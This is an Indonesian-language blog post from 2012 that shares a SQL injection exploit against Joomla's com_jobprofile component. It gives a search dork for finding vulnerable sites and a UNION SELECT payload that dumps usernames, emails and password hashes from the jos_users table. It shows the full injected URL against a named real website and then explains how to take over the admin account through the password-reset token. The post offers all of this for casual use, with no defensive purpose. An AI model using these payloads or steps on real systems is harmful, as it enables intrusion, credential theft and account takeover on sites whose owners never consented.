Sabtu, 01 Desember 2012

0 Joomla SQL Injection Vulnerability

Diposting oleh Unknown di 07.07
Kali ini saya akan share sdikit mainan nihh buat yg masih belajar kaya ane =))
mungkin ni exploit jadul tp masih work cuy :*
buat master lewat ajah yaahh =)
dork : inurl:"index.php?option=com_jobprofile
dork bisa di explorasi lg sesuka hati =))
exploit : +union+all+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9+from+jos_users–
 demo : http://www.chartercommerce.com.au/index.php?option=com_jobprofile&Itemid=61&task=profilesview&id=1

Jadi : http://www.chartercommerce.com.au/index.php?option=com_jobprofile&Itemid=61&task=profilesview&id=-1+union+all+select+1,concat_ws(0x3a,id,name,username,email,password,usertype,block,sendEmail,gid,registerDate,lastvisitDate,activation,params),3,4,5,6,7,8,9+from+jos_users

Jika sudah mendapatkan email admin. ente bisa reset passnya gan,
reset pass : /index.php?option=com_user&view=reset

masukin emailnya d kolom itu lalu klik submit ,,setelah itu masukan token yg di dapat td lalu klik submit...alhasil tinggal tulis password baru =))

NB : kalo tokennya ada symbol $$$$ ( salt ) mendingan cari target lain karena saya juga mumet ma salt Gmna caranya buat tusbol =))

Selamat Mencoba :)
Sumber : Here
Home » » Joomla SQL Injection Vulnerability

0 Comments

Bagaimana Pendapat Anda ?

Langganan: Posting Komentar (Atom)
 
Copyright © 2012 SpirdBird Comunity
Desain Template oleh Donstera